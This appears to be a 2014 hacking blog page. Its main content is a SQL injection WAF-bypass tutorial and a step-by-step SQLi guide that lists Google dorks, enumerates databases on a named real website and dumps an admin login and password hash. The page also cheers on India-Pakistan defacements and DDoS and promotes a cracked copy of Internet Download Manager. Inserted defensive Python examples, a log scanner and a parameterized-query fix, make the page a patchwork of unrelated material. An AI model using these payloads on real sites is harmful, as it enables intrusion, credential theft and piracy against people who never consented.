Monday, September 22, 2014

sql injection waf bypassing

Hi all... I think you all know basic SQL injection. But sometimes, after you start a SQL injection, you get a FORBIDDEN page (403 error). Normally you get this error after you have found the vulnerable page and the column count, when you start the UNION SELECT statement...
This is because a server-side firewall or WAF is filtering some of your requests. Don't be sad, we can bypass it. Now I am going to show you one of the simple methods to bypass a WAF.
Before starting, just relax. A WAF is just a workaround; it can be bypassed.

So, let's begin...
I found a site and confirmed it is vulnerable to SQL injection:
http://www.site.com/index.php?id=123' //error
Then find the column count using the ORDER BY statement:
http://www.site.com/index.php?id=123 order by 10 --
The page will show some errors, so the column count is 9.
OK, now we have to find the vulnerable column. For that we have to use UNION SELECT:
http://www.site.com/index.php?id=123 union select 1,2,3,4,5,6,7,8,9--
Ah, suddenly we get a Forbidden error on our screen. Usually after getting this error we leave the site.
Now there is no need to leave the site; we can hack it by altering the statement to bypass the WAF/firewall:
http://www.site.com/index.php?id=123/*!UNION*//*!SELECT*/1,2,3,4,5--
So what we did is add some special symbols to bypass the WAF.
"I am not going into a deep explanation of it now; if anybody needs it, they can ask me at any time."
So what we did is just replace UNION SELECT with /*!UNION*//*!SELECT*/
Boom.. now the page shows some numbers. Those are the vulnerable columns.
So now we can extract some data:
http://www.site.com/index.php?id=123 /*!UNION*//*!SELECT*/+1,CONCAT(database(),user(),version()),3,4,5-- (403 Forbidden – WTF?)
Forbidden again.
That is because the WAF filters the CONCAT statement, so we have to alter it.
The code will look like this:
http://www.site.com/index.php?id=123 /*!UNION*/ /*!SELECT*/1,/*!CONCAT*/(database(),user(),version()),3,4,5--
So now the page gives us the database, the user and the version.
The rest is the same as normal SQLi.
Use the /*!group_concat*/ statement for finding all the available DBs and so on...

There are some other methods too; I will explain them in my next post. Any doubts? Feel free to ask.
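
The rewritten requests get through because MySQL executes the body of a `/*! ... */` comment as SQL, while a filter that matches keywords separated by whitespace sees only a comment. The following is an added example, not part of the original post: a log check that unwraps those comments before matching. The log lines, rule patterns and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Keyword rule of the kind the post gets past: "union select" split only by whitespace.
NAIVE = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)
# MySQL runs the body of /*! ... */ (and /*!50000 ... */) comments as SQL.
VERSIONED = re.compile(r"/\*!\d*(.*?)\*/", re.S)
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)
SUSPICIOUS = re.compile(
    r"\bunion\s+(?:all\s+)?select\b|\binformation_schema\b"
    r"|\b(?:group_)?concat\s*\(|@@version", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')

def normalize(query: str) -> str:
    """Reduce a query string to roughly what the MySQL parser would see."""
    for _ in range(2):                      # also undo double URL-encoding
        query = unquote_plus(query)
    query = VERSIONED.sub(r" \1 ", query)   # unwrap executable comments
    query = PLAIN_COMMENT.sub(" ", query)   # ordinary comments act as whitespace
    return re.sub(r"\s+", " ", query).strip()

def scan(log_lines):
    """Return (line_no, naive_hit, normalized_hit) for each request with a query."""
    results = []
    for no, line in enumerate(log_lines, 1):
        m = REQUEST.search(line)
        if not m or "?" not in m.group(1):
            continue
        query = m.group(1).split("?", 1)[1]
        naive = bool(NAIVE.search(unquote_plus(query)))
        hardened = bool(SUSPICIOUS.search(normalize(query)))
        results.append((no, naive, hardened))
    return results

# Constructed access-log lines (documentation IP range), modelled on the requests above.
SAMPLE_LOG = [
    '203.0.113.7 - - [22/Sep/2014:10:01:02 +0000] "GET /index.php?id=123 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [22/Sep/2014:10:01:09 +0000] "GET /index.php?id=123%20union%20select%201,2,3,4,5-- HTTP/1.1" 403 199',
    '203.0.113.7 - - [22/Sep/2014:10:01:15 +0000] "GET /index.php?id=123/*!UNION*//*!SELECT*/1,2,3,4,5-- HTTP/1.1" 200 5133',
    '203.0.113.7 - - [22/Sep/2014:10:01:31 +0000] "GET /index.php?id=123%20/*!UNION*/%20/*!SELECT*/1,/*!CONCAT*/(database(),user(),version()),3,4,5-- HTTP/1.1" 200 5170',
]

if __name__ == "__main__":
    for no, naive, hardened in scan(SAMPLE_LOG):
        print(f"line {no}: naive={naive} normalized={hardened}")
```

A 403 followed within seconds by a 200 for the same parameter from the same client, as in the constructed lines 2 and 3, is itself worth alerting on.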

SQL Injection Full Tutorial With Photo


SQL Injection Tutorial:

  1. Finding vulnerable sites
  2. Finding amount of columns
  3. Getting mysql version
  4. Getting Databases
  5. Getting Tables
  6. Getting Columns
  7. Getting Usernames and Passwords 

1. Finding vulnerable sites
  • inurl:index.php?id=
  • inurl:news.php?id=
  • inurl:gallery.php?id=
  • inurl:category.php?id=
  • inurl:games.php?id=
  • inurl:forum.php?tid=
  • inurl:newsletter.php?id=
  • inurl:content.php?id=

You can find the largest collection of google dorks from here.


As an example, I found a vulnerable site:
http://www.geotunis.org/index_en.php?id=7


I learn about the vulnerability by using a single quote ('). Put ' at the end of the URL, and if you get an error then the site is vulnerable. Many sites don't show an error, but some text or an image is missing. Sites of this kind are also vulnerable.







2. Finding Amount of Columns
To find the right number of columns we use "order by". After the URL type 'order by 5' and see the page.
Here I do


It seems that the page loads normally and there is no error. That means there are more than 5 columns.
Try again


It shows an error. That means the number of columns is less than 10.
Keep trying this way to find the number of columns.
www.geotunis.org/index_en.php?id=7 order by 6-- [no error]
www.geotunis.org/index_en.php?id=7 order by 7-- [no error]
www.geotunis.org/index_en.php?id=7 order by 8-- [no error]
So total column number is 8.

Now we find the vulnerable column. To do this, please follow me:
www.geotunis.org/index_en.php?id=-7 union all select 1,2,3,4,5,6,7,8--
After id= insert a minus sign (-); it means null, so the original query returns no row.

We find that the vulnerable column is 4.


3. Getting Mysql Version
Now we want to know the MySQL version. If it's over 5, it's injectable with this tutorial (if it's under 4, you have to guess tables and columns).
www.geotunis.org/index_en.php?id=-7 union all select 1,2,3,@@version,5,6,7,8--
In the vulnerable column we use @@version instead of the column number.

4. Getting Databases
Now we want to find the databases and the current database.
Here is the syntax for all databases:

www.geotunis.org/index_en.php?id=-7 union all select 1,2,3,group_concat(schema_name),5,6,7,8 from information_schema.schemata--

And it displays like this:



Now we would like to know what the current database is. It's pretty obvious in this case, but it is useful sometimes.

Syntax for current database:
www.geotunis.org/index_en.php?id=-7 union all select 1,2,3,database(),5,6,7,8 from information_schema.schemata--
This should display something like this:

5. Getting Tables
Now we want to know the tables in the database, and for this we will continue using "union select".

www.geotunis.org/index_en.php?id=-7 union all select 1,2,3,group_concat(table_name),5,6,7,8 from information_schema.tables where table_schema=database()--

Its output looks like this:



Here the admin table is 'utilisateurs'. On most sites the tables are admin, users, administrator, etc.


6. Getting Columns
Now we want to know the columns.
We will use following code:

www.geotunis.org/index_en.php?id=-7 union all select 1,2,3,group_concat(column_name),5,6,7,8 from information_schema.columns where table_schema=database()--

We got the columns, and they look like:

7. Dumping users/pass

Now you would like to dump logins and passwords.

www.geotunis.org/index_en.php?id=-7 union all select 1,2,3,group_concat(login,0x3a,pass,0x3a),5,6,7,8 from utilisateurs--



Here login: atign and pass: 720a7e98c63c155ae17b0e7d3ce10a09
The pass is an MD5 hash. You can look this hash up at www.md5hacker.com

Thanks. If this tutorial was helpful to you, please leave a comment and give us a review on Alexa.

----------------------------------------------------------------------------------------------------------------

Thanks for reading my tutorial. Comments would be appreciated.
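
Every step of this tutorial depends on the `id` value being concatenated into the SQL text. Added example, not code from the original post: Python's sqlite3 stands in for the PHP/MySQL site, the table `utilisateurs` and its `login`/`pass` columns are named as in the tutorial, and the `articles` table, all rows and the function names are constructed. It runs the same parameter through a concatenated query and through a validated, bound one.

```python
import re
import sqlite3

def make_db():
    """In-memory stand-in for the site's database; every row is constructed."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE utilisateurs (login TEXT, pass TEXT);
        INSERT INTO articles VALUES (7, 'Welcome', 'Constructed article body');
        INSERT INTO utilisateurs VALUES ('demo_admin', 'constructed-hash-value');
    """)
    return conn

def fetch_article_vulnerable(conn, id_param):
    # The parameter becomes part of the SQL text, so it can add its own UNION.
    sql = "SELECT id, title, body FROM articles WHERE id=" + id_param
    return conn.execute(sql).fetchall()

def fetch_article_safe(conn, id_param):
    # 1) Allow-list: an article id is a short run of digits, nothing else.
    if not re.fullmatch(r"[0-9]{1,9}", id_param):
        return []
    # 2) Bind the value; the driver never parses it as SQL.
    sql = "SELECT id, title, body FROM articles WHERE id = ?"
    return conn.execute(sql, (int(id_param),)).fetchall()

# Same shape as the tutorial's request, cut down to this table's three columns.
INJECTED = "-7 union all select 1, login, pass from utilisateurs--"

if __name__ == "__main__":
    db = make_db()
    print(fetch_article_vulnerable(db, INJECTED))  # rows from utilisateurs leak
    print(fetch_article_safe(db, INJECTED))        # rejected before reaching SQL
    print(fetch_article_safe(db, "7"))             # normal page still works
```

The bound query is the fix; the digit check only gives a clean rejection point to log and alert on.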


Saturday, September 20, 2014

600 sites Restored by Indian Mad Hunter

Pakistani hacker groups continue to hack Indian sites and leave anti-Indian messages on the deface pages, but at the same time a rising Indian hacking group, Indian Mad Hunter, restored all the sites, changed the deface pages and gave a strong message to the Pakistani hackers.


Today, 6th September, is Pakistan Defence Day, and it seems that some Pakistani hackers are celebrating the day with their hacks. On such occasions hackers mainly hack and deface sites of other countries, but here we got to see something different.

An unknown Pakistani hacker has hacked and defaced the official site of the Pakistan Minister of Interior (www.interior.gov.pk). On the deface page the hacker wrote the following message:

Patwari's Hacked
  Happy Pakistan Defence Day
so called MR.BEAN owned ?
Mr.bean Your hair are as fake as Elections 2013

The deface page also contains a video in which users have made a comic of the Pakistan politicians.

The message on the deface page shows that the hackers don't like the minister of Pakistan and are teasing him.
Something similar was done earlier on the official Pakistan National web portal, where hackers made a troll photo of the Pakistan minister and posted it under the message section of the page.
It seems that these hackers are not happy with the Pakistan government or its ministers and are showing their protest by hacking government sites with comic images.
On zone-h someone made a mirror of the hack under the name ZombiE_KsA, a popular hacker from Pakistan who has been inactive for quite a long time.
Two days ago, Pakistani hackers hacked some websites of the Indian political party Bhartiya Janta Party (BJP). The websites of the BJP Punjab and Bihar units were defaced, each by a different group of hackers: the BJP Bihar unit's website was defaced by a Pakistani hacker going by the online handle Muhammad Bilal, whereas the BJP Punjab unit's website was defaced by KING_HAXOR & AryanZ Khan Tr4ck3r, who are members of PAKISTAN HAXORS CREW. Along with this, the BJP Junagadh unit's website was defaced by a Pakistani hacker.

In all of these hacks the message on the deface page was about #Opkashmir. It seems that the Pakistani hackers were protesting over Kashmir (a state of India).

In this regard, a known Indian hacker (Yamraaj) has also defaced a Pakistani government website: the Press Information Department, Government of Pakistan (http://pid.gov.pk/site), was hacked and defaced by Yamraaj. Additionally, many Indian hackers came together and took a number of Pakistan government sites offline via DDoS attack.

This is not the first time that hackers from the two countries have hacked each other's domains. They have hacked a number of each other's sites before, and on the eve of Republic Day or Independence Day they have also hacked tonnes of each other's websites.

Yamraaj has previously hacked many government websites of Pakistan and Bangladesh.

Friday, September 19, 2014

Crack IDM Download

IDM 6.15 Build 8 Full Crack - Internet Download Manager 6.15 Final - Download IDM 615-Download IDM Free - Download Crack IDM
Internet Download Manager is a powerful file transfer manager that promises to accelerate downloads by up to 5 times. In addition, the application can also restart interrupted downloads and integrate into a large number of browsers, including Internet Explorer, Firefox, Google Chrome and Opera.

Internet Download Manager's interface is clean and well-organized, with large, stylish buttons that facilitate the management of the files in process. It is a great organizer too, as every single download can be moved into a different folder, depending on its type. Plus, it has a rich settings menu where you can change the way the program handles certain file formats or the default download locations.

We tried the quick update function too, which worked like a breeze and basically updated the application with just a single click. It all came down to choosing whether to update or not, and the whole job was done by the integrated updater that automatically downloaded the new files and installed them on the computer.

The application encases all the features specific to a decent download manager, including drag and drop support, a task scheduler, virus protection, queue processor, HTTPS support, progressive downloading with quotas, command line parameters, sounds, ZIP preview and proxy servers.

The tests revealed that the CPU and memory footprint is minimal, but this also depends on the download speed and the overall size of the file.

Internet Download Manager is a must have application for many users out there. It will prove itself essential for users who download large files on a regular basis.


Internet Download Manager (IDM) is a tool to increase download speeds by up to 500 percent, resume and schedule downloads.

Comprehensive error recovery and resume capability will restart broken or interrupted downloads due to lost connections, network problems, computer shutdowns, or unexpected power outages. Simple graphic user interface makes IDM user friendly and easy to use.

Internet Download Manager has a smart download logic accelerator that features intelligent dynamic file segmentation and safe multipart downloading technology to accelerate your downloads.

During the download process Internet Download Manager segments downloaded files dynamically, unlike other download accelerators and managers that segment files before the download starts. Internet Download Manager reuses available connections without additional connect and login stages to achieve better acceleration performance.
Internet Download Manager supports proxy servers, ftp and http protocols, firewalls, redirects, cookies, directories with authorization, MP3 audio and MPEG video content processing, and a large number of directory listing formats.

IDM integrates seamlessly into Microsoft Internet Explorer, Netscape, MSN Explorer, AOL Explorer, Opera, Mozilla Firefox, Mozilla Firebird, Avant Browser, MyIE, Google Chrome, and all other popular browsers to automatically handle your downloads.

You can also drag and drop files, or use Internet Download Manager from command line. Internet Download Manager can dial your modem at the set time, download the files you want, then hang up or even shut down your computer when it's done.

Other features include multilingual support, zip preview, download categories, built-in download accelerator, scheduler pro, sounds on events, HTTPS support, queue processor, pipelining of ftp commands, html help and tutorial, enhanced virus protection on download completion, progressive downloading with quotas (useful for connections that use some kind of fair access policy or FAP like Direcway, Direct PC, Hughes, etc.), command line parameters, and many others.

Here are some key features of "Internet Download Manager":

· All popular browsers and applications are supported! Internet Download Manager supports all versions of popular browsers, and can be integrated into any 3rd party Internet applications.
· Download with one click. When you click on a download link in a browser, IDM will take over the download and accelerate it. IDM supports HTTP, FTP and HTTPS protocols.
· Download Speed. Internet Download Manager can accelerate downloads by up to 5 times due to its intelligent dynamic file segmentation technology.
· Download Resume. Internet Download Manager will resume unfinished downloads from the place where they left off.
· Simple installation wizard. Quick and easy installation program will make necessary settings for you, and check your connection at the end to ensure trouble free installation of Internet Download Manager
· Automatic Antivirus checking. Antivirus checking makes your downloads free from viruses and trojans.
· Advanced Browser Integration. When enabled, the feature can be used to catch any download from any application. None of download managers have this feature.
· Built-in Scheduler. Internet Download Manager can connect to the Internet at a set time, download the files you want, disconnect, or shut down your computer when it's done.
· IDM supports many types of proxy servers. For example, IDM works with Microsoft ISA, and FTP proxy servers.
· IDM supports main authentication protocols: Basic, Negotiate, NTLM, and Kerberos. Thus IDM can access many Internet and proxy servers using login name and password.
· Download All feature. IDM can add all downloads linked to the current page. It's easy to download multiple files with this feature.
· Customizable Interface. You may choose the order, and what buttons and columns appear on the main IDM window.
· Download Categories. Internet Download Manager can be used to organize downloads automatically using defined download categories.
· Quick Update Feature. Quick update may check for new versions of IDM and update IDM once per week.
· Download limits. Progressive downloading with quotas feature. The feature is useful for connections that use some kind of fair access policy (or FAP) like Direcway, Direct PC, Hughes, etc.
· Drag and Drop. You may simply drag and drop links to IDM, and drag and drop complete files out of Internet Download Manager.
· IDM is multilingual. IDM is translated to Arabic, Bosnian, Bulgarian, Chinese, Croatian, Czech, Danish, Dutch, French, German, Hungarian, Italian, Japanese, Lithuanian, Macedonian, Polish, Portuguese, Romanian, Russian, Slovenian, Spanish, Thai languages.



jay hind